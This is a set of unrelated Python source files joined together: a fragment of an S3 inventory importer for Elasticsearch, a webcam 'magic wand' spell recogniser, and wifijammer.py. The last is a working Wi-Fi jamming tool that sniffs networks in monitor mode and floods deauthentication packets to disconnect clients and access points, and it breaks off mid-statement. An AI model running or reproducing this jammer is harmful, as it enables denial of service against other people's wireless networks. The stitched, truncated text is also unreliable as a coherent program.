""" global buckets tree_dirs = [] tree_files = [] with gzip.open(inventory_file, mode='rt') as f: reader = csv.reader(f, delimiter=',', quotechar='"') l = 1 for row in reader: # get bucket name from first line of inventory file if l == 1: # add fake root /s3 directory entry to list if "/s3" not in buckets: s3threadlock.acquire() buckets.append("/s3") # create fake root /s3/bucketname directory entry for s3 bucket root_dict = make_fake_s3_dir('/', 's3', cliargs) s3threadlock.release() # check if bucket fake dir already created if root_dict: tree_dirs.append(root_dict) # add fake root /s3/bucketname directory entry for s3 bucket to list bucket_path = os.path.abspath(os.path.join('/s3', row[0])) if bucket_path not in buckets: s3threadlock.acquire() buckets.append(bucket_path) # create fake root /s3/bucketname directory entry for s3 bucket root_dict = make_fake_s3_dir('/s3', row[0], cliargs) s3threadlock.release() # check if bucket fake dir already created if root_dict: tree_dirs.append(root_dict) tree_dirs, tree_files = process_line(row, tree_dirs, tree_files, cliargs) l += 1 if len(tree_dirs) + len(tree_files) > 0: es_bulk_add(workername, tree_dirs, tree_files, cliargs, 0) def make_fake_s3_dir(parent, file, cliargs): """Make fake s3 directory function. Creates a fake directory doc for es. Returns dictionary for directory doc. """ global fake_dirs fullpath = os.path.abspath(os.path.join(parent, file)) if fullpath in fake_dirs: return None mtime_utc = "1970-01-01T00:00:00" mtime_unix = time.mktime(time.strptime(mtime_utc, '%Y-%m-%dT%H:%M:%S')) dir_dict = {} dir_dict['filename'] = file dir_dict['path_parent'] = parent dir_dict["filesize"] = 0 dir_dict["items"] = 1 # 1 for itself dir_dict["items_files"] = 0 dir_dict["items_subdirs"] = 0 dir_dict["last_modified"] = mtime_utc dir_dict["tag"] = "" dir_dict["tag_custom"] = "" dir_dict["indexing_date"] = datetime.utcnow().isoformat() dir_dict["worker_name"] = workername dir_dict["change_percent_filesize"] = "" dir_dict["change_percent_items"] = "" dir_dict["change_percent_items_files"] = "" dir_dict["change_percent_items_subdirs"] = "" dir_dict["_type"] = "directory" # add any autotags to inventory_dict if cliargs['autotag'] and len(config['autotag_dirs']) > 0: auto_tag(dir_dict, 'directory', mtime_unix, None, None) # check plugins for adding extra meta data to dirmeta_dict for plugin in plugins: try: # check if plugin is for directory doc mappings = {'mappings': {'directory': {'properties': {}}}} plugin.add_mappings(mappings) dir_dict.update(plugin.add_meta(fullpath)) except KeyError: pass # store in fake_dirs s3threadlock.acquire() fake_dirs.append(fullpath) s3threadlock.release() return dir_dict def get_s3_mappings(config): mappings = { "settings": { "index" : { "number_of_shards": config['index_shards'], "number_of_replicas": config['index_replicas'] } }, "mappings": { "directory": { "properties": { "s3_bucket": { "type": "keyword" }, "s3_key": { "type": "keyword" }, "s3_etag": { "type": "keyword" }, "s3_storage_class": { "type": "keyword" }, "s3_multipart_upload": { "type": "boolean" }, "s3_replication_status": { "type": "keyword" }, "s3_encryption_status": { "type": "keyword" }, "filename": { "type": "keyword" }, "path_parent": { "type": "keyword" }, "filesize": { "type": "long" }, "items": { "type": "long" }, "items_files": { "type": "long" }, "items_subdirs": { "type": "long" }, "last_modified": { "type": "date" }, "tag": { "type": "keyword" }, "tag_custom": { "type": "keyword" }, "indexing_date": { "type": "date" }, "worker_name": { "type": 
"keyword" }, "change_percent_filesize": { "type": "float" }, "change_percent_items": { "type": "float" }, "change_percent_items_files": { "type": "float" }, "change_percent_items_subdirs": { "type": "float" } } }, "file": { "properties": { "s3_bucket": { "type": "keyword" }, "s3_key": { "type": "keyword" }, "s3_etag": { "type": "keyword" }, "s3_storage_class": { "type": "keyword" }, "s3_multipart_upload": { "type": "boolean" }, "s3_replication_status": { "type": "keyword" }, "s3_encryption_status": { "type": "keyword" }, "filename": { "type": "keyword" }, "extension": { "type": "keyword" }, "path_parent": { "type": "keyword" }, "filesize": { "type": "long" }, "last_modified": { "type": "date" }, "filehash": { "type": "keyword" }, "tag": { "type": "keyword" }, "tag_custom": { "type": "keyword" }, "dupe_md5": { "type": "keyword" }, "indexing_date": { "type": "date" }, "worker_name": { "type": "keyword" } } } } } return mappings def csv_file_reader(q): """s3 inventory file reader thread function. """ while True: item = q.get() inventory_file, cliargs = item process_s3_inventory(inventory_file, cliargs) q.task_done() def start_importing(es, cliargs, logger): """Start importing s3 inventory file function. """ for i in range(4): thread = Thread(target=csv_file_reader, args=(s3queue,)) thread.daemon = True thread.start() # start importing S3 inventory file(s) inventory_files = cliargs['s3'] logger.info('Importing %s S3 inventory file(s)...' % len(inventory_files)) # add fake disk space to index with path set to /s3 data = { "path": '/s3', "total": 0, "used": 0, "free": 0, "available": 0, "indexing_date": datetime.utcnow().isoformat() } es.index(index=cliargs['index'], doc_type='diskspace', body=data) # add all s3 inventory files to queue for file in inventory_files: s3queue.put((file, cliargs)) # set up progress bar bar = progress_bar('Importing') bar.start() if not cliargs['quiet'] and not cliargs['debug'] and not cliargs['verbose']: i = 1 while s3queue.qsize() > 0: try: percent = int("{0:.0f}".format(100 * ((len(inventory_files) - s3queue.qsize()) / float(len(inventory_files))))) bar.update(percent) except ZeroDivisionError: bar.update(0) except ValueError: bar.update(0) time.sleep(.5) i += 1 bar.finish() # wait for queue to be empty s3queue.join()
potterclock.py
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. #https://github.com/piwheels/piwheels/issues/21 import sys import cv2 from cv2 import * import numpy as np import math import os from os import listdir from os.path import isfile, join, isdir import time import datetime import threading from threading import Thread from statistics import mean from CountsPerSec import CountsPerSec # Import library and create instance of REST client. #from Adafruit_IO import Client #aio = Client('YOUR ADAFRUIT IO USERNAME', 'YOUR ADAFRUIT IO KEY') #from HassApi import HassApi # Check for required number of arguments #if (len(sys.argv) < 4): #print("Incorrect number of arguments. Required Arguments: [video source url] [home assistant URL] [API token]") #sys.exit(0) # Parse Required Arguments #videoSource = sys.argv[1] #hassUrl = sys.argv[2] #hassRestToken = sys.argv[3] # Parse Optional Arguments IsRemoveBackground = True IsShowOutputWindows = True IsTraining = False IsDebugFps = False if (len(sys.argv) >= 5): IsRemoveBackground = sys.argv[4] == "True" if (len(sys.argv) >= 6): IsShowOutputWindows = sys.argv[5] == "True" if (len(sys.argv) >= 7): IsTraining = sys.argv[6] == "True" if (len(sys.argv) >= 8): IsDebugFps = sys.argv[7] == "True" # Initialize Home Assistant Rest API Wrapper #hass = HassApi(hassUrl, hassRestToken) # Constants DesiredFps = 42 DefaultFps = 42 # Original constants trained for 42 FPS MicroSecondsBetweenFrames = (1 / DesiredFps) * 1000000 TrainingResolution = 50 TrainingNumPixels = TrainingResolution * TrainingResolution TrainingFolderName = "Training" SpellEndMovement = 0.5 * (DefaultFps / DesiredFps ) MinSpellLength = 15 * (DesiredFps / DefaultFps) MinSpellDistance = 100 NumDistancesToAverage = int(round( 20 * (DesiredFps / DefaultFps))) # Booleans to turn on or off output windows IsShowOriginal = False IsShowBackgroundRemoved = False IsShowThreshold = False IsShowOutput = False if IsShowOutputWindows: IsShowOriginal = True IsShowBackgroundRemoved = True IsShowThreshold = True IsShowOutput = True # Create Windows if (IsShowOriginal): cv2.namedWindow("Original") cv2.moveWindow("Original", 0, 0) if (IsShowBackgroundRemoved): cv2.namedWindow("BackgroundRemoved") cv2.moveWindow("BackgroundRemoved", 640, 0) if (IsShowThreshold): cv2.namedWindow("Threshold") cv2.moveWindow("Threshold", 0, 480+30) if (IsShowOutput): cv2.namedWindow("Output") cv2.moveWindow("Output", 640, 480+30) # Init Global Variables IsNewFrame = False nameLookup = {} LastSpell = "None" originalCps = CountsPerSec() noBackgroundCps = CountsPerSec() thresholdCps = CountsPerSec() outputCps = CountsPerSec() lk_params = dict( winSize = (25,25), maxLevel = 7, criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03)) IsNewFrame = False frame = None IsNewFrameNoBackground = False frame_no_background = None IsNewFrameThreshold = False frameThresh = None findNewWands = True trackedPoints = None wandTracks = [] def InitClassificationAlgo() : """ Create and Train k-Nearest Neighbor Algorithm """ global knn, nameLookup labelNames = [] labelIndexes = [] trainingSet = [] numPics = 0 dirCount = 0 scriptpath = 
os.path.realpath(__file__) trainingDirectory = join(os.path.dirname(scriptpath), TrainingFolderName) # Every folder in the training directory contains a set of images corresponding to a single spell. # Loop through all folders to train all spells. for d in listdir(trainingDirectory): if isdir(join(trainingDirectory, d)): nameLookup[dirCount] = d dirCount = dirCount + 1 for f in listdir(join(trainingDirectory,d)): if isfile(join(trainingDirectory,d,f)): labelNames.append(d) labelIndexes.append(dirCount-1) trainingSet.append(join(trainingDirectory,d,f)); numPics = numPics + 1 print ("Trained Spells: ") print (nameLookup) samples = [] for i in range(0, numPics): img = cv2.imread(trainingSet[i]) gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) samples.append(gray); npArray = np.array(samples) shapedArray = npArray.reshape(-1,TrainingNumPixels).astype(np.float32); # Create KNN and Train knn = cv2.ml.KNearest_create() knn.train(shapedArray, cv2.ml.ROW_SAMPLE, np.array(labelIndexes)) def ClassifyImage(img): """ Classify input image based on previously trained k-Nearest Neighbor Algorithm """ global knn, nameLookup, args if (img.size <= 0): return "Error" size = (TrainingResolution, TrainingResolution) test_gray = cv2.resize(img,size,interpolation=cv2.INTER_LINEAR) imgArr = np.array(test_gray).astype(np.float32) sample = imgArr.reshape(-1, TrainingNumPixels).astype(np.float32) ret, result, neighbours, dist = knn.findNearest(sample,k=5) print(ret, result, neighbours, dist) if IsTraining: filename = "char" + str(time.time()) + nameLookup[ret] + ".png" cv2.imwrite(join(TrainingFolderName, filename), test_gray) if nameLookup[ret] is not None: print("Match: " + nameLookup[ret]) return nameLookup[ret] else: return "error" def PerformSpell(spell): """ Make the desired Home Assistant REST API call based on the spell """ if (spell=="incendio"): print("do this spell") #test = aio.feeds('test') #aio.send_data(test.key, 98.6) #hass.TriggerAutomation("automation.wand_incendio") elif (spell=="aguamenti"): print("do this spell") #hass.TriggerAutomation("automation.wand_aguamenti") elif (spell=="alohomora"): print("do this spell") #hass.TriggerAutomation("automation.wand_alohomora") elif (spell=="silencio"): print("do this spell") #hass.TriggerAutomation("automation.wand_silencio") elif (spell=="specialis_revelio"): print("do this spell") #hass.TriggerAutomation("automation.wand_specialis_revelio") elif (spell=="revelio"): print("do this spell") #hass.TriggerAutomation("automation.wand_revelio") elif (spell == "tarantallegra"): print("do this spell") #hass.TriggerAutomation("automation.wand_tarantallegra") def CheckForPattern(wandTracks, exampleFrame): """ Check the given wandTracks to see if is is complete, and if it matches a trained spell """ global find_new_wands, LastSpell if (wandTracks == None or len(wandTracks) == 0): return thickness = 10 croppedMax = TrainingResolution - thickness distances = [] wand_path_frame = np.zeros_like(exampleFrame) prevTrack = wandTracks[0] for track in wandTracks: x1 = prevTrack[0] x2 = track[0] y1 = prevTrack[1] y2 = track[1] # Calculate the distance distance = math.sqrt((x1 - x2)**2 + (y1 - y2)**2) distances.append(distance) cv2.line(wand_path_frame, (x1, y1),(x2, y2), (255,255,255), thickness) prevTrack = track mostRecentDistances = distances[-NumDistancesToAverage:] avgMostRecentDistances = mean(mostRecentDistances) sumDistances = sum(distances) contours, hierarchy = cv2.findContours(wand_path_frame,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE) # Determine if wand stopped moving 
by looking at recent movement (avgMostRecentDistances), and check the length of distances to make sure the spell is reasonably long if (avgMostRecentDistances < SpellEndMovement and len(distances) > MinSpellLength): # Make sure wand path is valid and is over the defined minimum distance if (len(contours) > 0) and sumDistances > MinSpellDistance: cnt = contours[0] x,y,w,h = cv2.boundingRect(cnt) crop = wand_path_frame[y-10:y+h+10,x-30:x+w+30] result = ClassifyImage(crop); cv2.putText(wand_path_frame, result, (0,50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255,255,255)) print("Result: ", result, " Most Recent avg: ", avgMostRecentDistances, " Length Distances: ", len(distances), " Sum Distances: ", sumDistances) print("") PerformSpell(result) LastSpell = result find_new_wands = True wandTracks.clear() if wand_path_frame is not None: if (IsShowOutput): wandPathFrameWithText = AddIterationsPerSecText(wand_path_frame, outputCps.countsPerSec()) cv2.putText(wandPathFrameWithText, "Last Spell: " + LastSpell, (10, 400), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255)) cv2.imshow("Output", wandPathFrameWithText) return wandTracks def RemoveBackground(): """ Thread for removing background """ global frame, frame_no_background, IsNewFrame, IsNewFrameNoBackground fgbg = cv2.createBackgroundSubtractorMOG2() t = threading.currentThread() while getattr(t, "do_run", True): if (IsNewFrame): IsNewFrame = False frameCopy = frame.copy() # Subtract Background fgmask = fgbg.apply(frameCopy, learningRate=0.001) frame_no_background = cv2.bitwise_and(frameCopy, frameCopy, mask = fgmask) IsNewFrameNoBackground = True if (IsShowBackgroundRemoved): frameNoBackgroundWithCounts = AddIterationsPerSecText(frame_no_background.copy(), noBackgroundCps.countsPerSec()) cv2.imshow("BackgroundRemoved", frameNoBackgroundWithCounts) else: time.sleep(0.001) def CalculateThreshold(): """ Thread for calculating frame threshold """ global frame, frame_no_background, frameThresh, IsNewFrame, IsNewFrameNoBackground, IsNewFrameThreshold t = threading.currentThread() thresholdValue = 240 while getattr(t, "do_run", True): if (IsRemoveBackground and IsNewFrameNoBackground) or (not IsRemoveBackground and IsNewFrame): if IsRemoveBackground: IsNewFrameNoBackground = False frame_gray = cv2.cvtColor(frame_no_background, cv2.COLOR_BGR2GRAY) if not IsRemoveBackground: IsNewFrame = False frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) ret, frameThresh = cv2.threshold(frame_gray, thresholdValue, 255, cv2.THRESH_BINARY); IsNewFrameThreshold = True if (IsShowThreshold): frameThreshWithCounts = AddIterationsPerSecText(frameThresh.copy(), thresholdCps.countsPerSec()) cv2.imshow("Threshold", frameThreshWithCounts) else: time.sleep(0.001) def ProcessData(): """ Thread for processing final frame """ global frameThresh, IsNewFrameThreshold, findNewWands, wandTracks, outputFrameCount oldFrameThresh = None trackedPoints = None t = threading.currentThread() while getattr(t, "do_run", True): if (IsNewFrameThreshold): if (IsDebugFps): outputFrameCount = outputFrameCount + 1 IsNewFrameThreshold = False localFrameThresh = frameThresh.copy() if (findNewWands): # Identify Potential Wand Tips using GoodFeaturesToTrack trackedPoints = cv2.goodFeaturesToTrack(localFrameThresh, 5, .01, 30) if trackedPoints is not None: findNewWands = False else: # calculate optical flow nextPoints, statusArray, err = cv2.calcOpticalFlowPyrLK(oldFrameThresh, localFrameThresh, trackedPoints, None, **lk_params) # Select good points good_new = nextPoints[statusArray==1] good_old = 
trackedPoints[statusArray==1] if (len(good_new) > 0): # draw the tracks for i,(new,old) in enumerate(zip(good_new,good_old)): a,b = new.ravel() c,d = old.ravel() wandTracks.append([a, b]) # Update which points are tracked trackedPoints = good_new.copy().reshape(-1,1,2) wandTracks = CheckForPattern(wandTracks, localFrameThresh) else: # No Points were tracked, check for a pattern and start searching for wands again #wandTracks = CheckForPattern(wandTracks, localFrameThresh) wandTracks = [] findNewWands = True # Store Previous Threshold Frame oldFrameThresh = localFrameThresh else: time.sleep(0.001) def AddIterationsPerSecText(frame, iterations_per_sec): """ Add iterations per second text to lower-left corner of a frame. """ cv2.putText(frame, "{:.0f} iterations/sec".format(iterations_per_sec), (10, 450), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255)) return frame timeLastPrintedFps = datetime.datetime.now() inputFrameCount = 0 outputFrameCount = 0 # Initialize and traing the spell classification algorithm InitClassificationAlgo() # Start thread to remove frame background if IsRemoveBackground: RemoveBackgroundThread = Thread(target=RemoveBackground) RemoveBackgroundThread.do_run = True RemoveBackgroundThread.daemon = True RemoveBackgroundThread.start() # Start thread to calculate threshold CalculateThresholdThread = Thread(target=CalculateThreshold) CalculateThresholdThread.do_run = True CalculateThresholdThread.daemon = True CalculateThresholdThread.start() # Start thread to process final frame ProcessDataThread = Thread(target=ProcessData) ProcessDataThread.do_run = True ProcessDataThread.daemon = True ProcessDataThread.start() # Set OpenCV video capture source videoCapture = cv2.VideoCapture(videoSource) # Main Loop while True: # Get most recent frame ret, localFrame = videoCapture.read() if (ret): frame = localFrame.copy() # If successful, flip the frame and set the Flag for the next process to take over cv2.flip(frame, 1, frame) # Flipping the frame is done so the spells look like what we expect, instead of the mirror image IsNewFrame = True if (IsDebugFps): inputFrameCount = inputFrameCount + 1 # Print FPS Debug info every second if ((datetime.datetime.now() - timeLastPrintedFps).seconds >= 1 ): timeLastPrintedFps = datetime.datetime.now() print("FPS: %d/%d" %(inputFrameCount, outputFrameCount)) inputFrameCount = 0 outputFrameCount = 0 # Update Windows if (IsShowOriginal): frameWithCounts = AddIterationsPerSecText(frame.copy(), originalCps.countsPerSec()) cv2.imshow("Original", frameWithCounts) elif not ret: # If an error occurred, try initializing the video capture again videoCapture = cv2.VideoCapture(videoSource) # Check for ESC key, if pressed shut everything down if (cv2.waitKey(1) is 27): break # Shutdown PyPotter if IsRemoveBackground: RemoveBackgroundThread.do_run = False RemoveBackgroundThread.join() CalculateThresholdThread.do_run = False ProcessDataThread.do_run = False CalculateThresholdThread.join() ProcessDataThread.join() cv2.destroyAllWindows()
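# --- Editor's sketch (not part of the original script): InitClassificationAlgo() and
# ClassifyImage() above reduce to OpenCV's k-Nearest Neighbour API -- flatten each
# 50x50 grayscale image into a float32 row vector, train on labelled rows, then call
# findNearest() on a new flattened image. The same flow with synthetic data standing
# in for the Training/ folder:
import cv2
import numpy as np

TRAINING_RESOLUTION = 50
NUM_PIXELS = TRAINING_RESOLUTION * TRAINING_RESOLUTION

# two fake "spell" classes: dark images -> label 0, bright images -> label 1
dark = np.random.randint(0, 60, (20, NUM_PIXELS)).astype(np.float32)
bright = np.random.randint(200, 256, (20, NUM_PIXELS)).astype(np.float32)
samples = np.vstack([dark, bright])
labels = np.array([0] * 20 + [1] * 20, dtype=np.float32)[:, np.newaxis]

knn = cv2.ml.KNearest_create()
knn.train(samples, cv2.ml.ROW_SAMPLE, labels)

# classify one new bright image, flattened the same way ClassifyImage() does
test_img = np.full((TRAINING_RESOLUTION, TRAINING_RESOLUTION), 230, dtype=np.uint8)
sample = test_img.reshape(-1, NUM_PIXELS).astype(np.float32)
ret, result, neighbours, dist = knn.findNearest(sample, k=5)
print('predicted label:', int(ret))  # expected: 1 (the "bright" class)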
wifijammer.py
#!/usr/bin/env python # -*- coding: UTF-8 -*- import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy from scapy.all import * conf.verb = 0 # Scapy I thought I told you to shut up import os import sys import time from threading import Thread, Lock from subprocess import Popen, PIPE from signal import SIGINT, signal import argparse import socket import struct import fcntl # Console colors W = '\033[0m' # white (normal) R = '\033[31m' # red G = '\033[32m' # green O = '\033[33m' # orange B = '\033[34m' # blue P = '\033[35m' # purple C = '\033[36m' # cyan GR = '\033[37m' # gray T = '\033[93m' # tan def parse_args(): #Create the arguments parser = argparse.ArgumentParser() parser.add_argument("-s", "--skip", nargs='*', default=[], help="Skip deauthing this MAC address. \ Example: -s 00:11:BB:33:44:AA") parser.add_argument("-i", "--interface", help="Choose monitor mode interface. \ By default script will find the most powerful \ interface and starts monitor mode on it. \ Example: -i mon5") parser.add_argument("-c", "--channel", help="Listen on and deauth only clients on the specified channel. \ Example: -c 6") parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. \ List of clients will be emptied and repopulated \ after hitting the limit. Example: -m 5") parser.add_argument("-n", "--noupdate", help="Do not clear the deauth list when the maximum (-m) \ number of client/AP combos is reached. \ Must be used in conjunction with -m. \ Example: -m 10 -n", action='store_true') parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. \ Default is as fast as possible. \ If you see scapy errors like 'no buffer space' \ try: -t .00001") parser.add_argument("-p", "--packets", help="Choose the number of packets to send in each deauth burst. \ Default value is 1; \ 1 packet to the client and 1 packet to the AP. \ Send 2 deauth packets to the client \ and 2 deauth packets to the AP: -p 2") parser.add_argument("-d", "--directedonly", help="Skip the deauthentication packets to the broadcast \ address of the access points and only send them \ to client/AP pairs", action='store_true') parser.add_argument("-a", "--accesspoint", nargs='*', default=[], help="Enter the SSID or MAC address of a specific access point to target") parser.add_argument("--world", help="N. American standard is 11 channels but the rest \ of the world it's 13 so this options enables the \ scanning of 13 channels", action="store_true") return parser.parse_args() ######################################## # Begin interface info and manipulation ######################################## def get_mon_iface(args): global monitor_on monitors, interfaces = iwconfig() if args.interface: monitor_on = True return args.interface if len(monitors) > 0: monitor_on = True return monitors[0] else: # Start monitor mode on a wireless interface print '['+G+'*'+W+'] Finding the most powerful interface...' 
interface = get_iface(interfaces) monmode = start_mon_mode(interface) return monmode def iwconfig(): monitors = [] interfaces = {} try: proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN) except OSError: sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"') for line in proc.communicate()[0].split('\n'): if len(line) == 0: continue # Isn't an empty string if line[0] != ' ': # Doesn't start with space wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line) if not wired_search: # Isn't wired iface = line[:line.find(' ')] # is the interface if 'Mode:Monitor' in line: monitors.append(iface) elif 'IEEE 802.11' in line: if "ESSID:\"" in line: interfaces[iface] = 1 else: interfaces[iface] = 0 return monitors, interfaces def get_iface(interfaces): scanned_aps = [] if len(interfaces) < 1: sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again') if len(interfaces) == 1: for interface in interfaces: return interface # Find most powerful interface for iface in interfaces: count = 0 proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN) for line in proc.communicate()[0].split('\n'): if ' - Address:' in line: # first line in iwlist scan for a new AP count += 1 scanned_aps.append((count, iface)) print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W try: interface = max(scanned_aps)[1] return interface except Exception as e: for iface in interfaces: interface = iface print '['+R+'-'+W+'] Minor error:',e print ' Starting monitor mode on '+G+interface+W return interface def start_mon_mode(interface): print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W try: os.system('ifconfig %s down' % interface) os.system('iwconfig %s mode monitor' % interface) os.system('ifconfig %s up' % interface) return interface except Exception: sys.exit('['+R+'-'+W+'] Could not start monitor mode') def remove_mon_iface(mon_iface): os.system('ifconfig %s down' % mon_iface) os.system('iwconfig %s mode managed' % mon_iface) os.system('ifconfig %s up' % mon_iface) def mon_mac(mon_iface): ''' http://stackoverflow.com/questions/159137/getting-mac-address ''' s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15])) mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1] print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W return mac ######################################## # End of interface info and manipulation ######################################## def channel_hop(mon_iface, args): ''' First time it runs through the channels it stays on each channel for 5 seconds in order to populate the deauth list nicely. 
After that it goes as fast as it can ''' global monchannel, first_pass channelNum = 0 maxChan = 11 if not args.world else 13 err = None while 1: if args.channel: with lock: monchannel = args.channel else: channelNum +=1 if channelNum > maxChan: channelNum = 1 with lock: first_pass = 0 with lock: monchannel = str(channelNum) try: proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE) except OSError: print '['+R+'-'+W+'] Could not execute "iw"' os.kill(os.getpid(),SIGINT) sys.exit(1) for line in proc.communicate()[1].split('\n'): if len(line) > 2: # iw dev shouldnt display output unless there's an error err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W output(err, monchannel) if args.channel: time.sleep(.05) else: # For the first channel hop thru, do not deauth if first_pass == 1: time.sleep(1) continue deauth(monchannel) def deauth(monchannel): ''' addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's multi-APs to one gateway. Constantly scans the clients_APs list and starts a thread to deauth each instance ''' pkts = [] if len(clients_APs) > 0: with lock: for x in clients_APs: client = x[0] ap = x[1] ch = x[2] # Can't add a RadioTap() layer as the first layer or it's a malformed # Association request packet? # Append the packets to a new list so we don't have to hog the lock # type=0, subtype=12? if ch == monchannel: deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth() deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth() pkts.append(deauth_pkt1) pkts.append(deauth_pkt2) if len(APs) > 0: if not args.directedonly: with lock: for a in APs: ap = a[0] ch = a[1] if ch == monchannel: deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth() pkts.append(deauth_ap) if len(pkts) > 0: # prevent 'no buffer space' scapy error http://goo.gl/6YuJbI if not args.timeinterval: args.timeinterval = 0 if not args.packets: args.packets = 1 for p in pkts: send(p, inter=float(args.timeinterval), count=int(args.packets)) def output(err, monchannel): os.system('clear') if err: print err else: print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n' if len(clients_APs) > 0: print ' Deauthing ch ESSID' # Print the deauth list with lock: for ca in clients_APs: if len(ca) > 3: print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W else: print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2] if len(APs) > 0: print '\n Access Points ch ESSID' with lock: for ap in APs: print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W print '' def noise_filter(skip, addr1, addr2): # Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC] if skip: ignore += [addr.lower() for addr in skip] for i in ignore: if i in addr1 or i in addr2: return True def cb(pkt): ''' Look for dot11 packets that aren't to or from broadcast address, are type 1 or 2 (control, data), and append the addr1 and addr2 to the list of deauth targets. ''' global clients_APs, APs # return these if's keeping clients_APs the same or just reset clients_APs? 
# I like the idea of the tool repopulating the variable more if args.maximum: if args.noupdate: if len(clients_APs) > int(args.maximum): return else: if len(clients_APs) > int(args.maximum): with lock: clients_APs = [] APs = [] # We're adding the AP and channel to the deauth list at time of creation rather # than updating on the fly in order to avoid costly for loops that require a lock if pkt.haslayer(Dot11): if pkt.addr1 and pkt.addr2: pkt.addr1 = pkt.addr1.lower() pkt.addr2 = pkt.addr2.lower() # Filter out all other APs and clients if asked if args.accesspoint: # track bssid for essid if (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)) and pkt[Dot11Elt].info in args.accesspoint: args.accesspoint.add(pkt[Dot11].addr3.lower()) # bail if bssid is not in target list if not args.accesspoint.intersection([pkt.addr1.lower(), pkt.addr2.lower()]): # pkt does not match our target list return if args.skip: if pkt.addr2 in args.skip: return # Check if it's added to our AP list if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp): APs_add(clients_APs, APs, pkt, args.channel, args.world) # Ignore all the noisy packets like spanning tree #if noise_filter(skip, pkt.addr1, pkt.addr2): # return # Management = 1, data = 2 if pkt.type in [1, 2]: clients_APs_add(clients_APs, pkt.addr1, pkt.addr2) def APs_add(clients_APs, APs, pkt, chan_arg, world_arg): ssid = pkt[Dot11Elt].info bssid = pkt[Dot11].addr3.lower() try: # Thanks to airoscapy for below ap_channel = str(ord(pkt[Dot11Elt:3].info)) chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13'] if ap_channel not in chans: return if chan_arg: if ap_channel != chan_arg: return except Exception as e: return if len(APs) == 0: with lock: return APs.append([bssid, ap_channel, ssid]) else: for b in APs: if bssid in b[0]: return with lock: return APs.append([bssid, ap_channel, ssid]) def clients_APs_add(clients_APs, addr1, addr2): if len(clients_APs) == 0: if len(APs) == 0: with lock: return clients_APs.append([addr1, addr2, monchannel]) else: AP_check(addr1, addr2) # Append new clients/APs if they're not in the list else: for ca in clients_APs: if addr1 in ca and addr2 in ca: return if len(APs) > 0: return AP_check(addr1, addr2) else: with lock: return clients_APs.append([addr1, addr2, monchannel]) def AP_check(addr1, addr2): for ap in APs: if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower(): with lock: return clients_APs.append([addr1, addr2, ap[1], ap[2]]) def stop(signal, frame): if monitor_on: sys.exit('\n['+R+'!'+W+'] Closing') else: remove_mon_iface(mon_iface) os.system('service network-manager restart') sys.exit('\n['+R+'!'+W+'] Closing') if __name__ == "__main__": if os.geteuid(): sys.exit('['+R+'-'+W+'] Please run as root') clients_APs = [] APs = [] DN = open(os.devnull, 'w') lock = Lock() args = parse_args() args.skip = list(map(str.lower, args.skip)) # lowercase bssids while leaving essids intact args.accesspoint = set(_.lower() if ':' in _ else _ for _ in args.accesspoint) monitor_on = None mon_iface = get_mon_iface(args) conf.iface = mon_iface mon_MAC = mon_mac(mon_iface) first_pass = 1 # Start channel hopping hop = Thread(target=channel_hop, args=(mon_iface, args)) hop.daemon = True hop.start() signal(SIGINT, stop) try: sniff(iface=mon_iface, store=0, prn=cb) except Exception as msg: 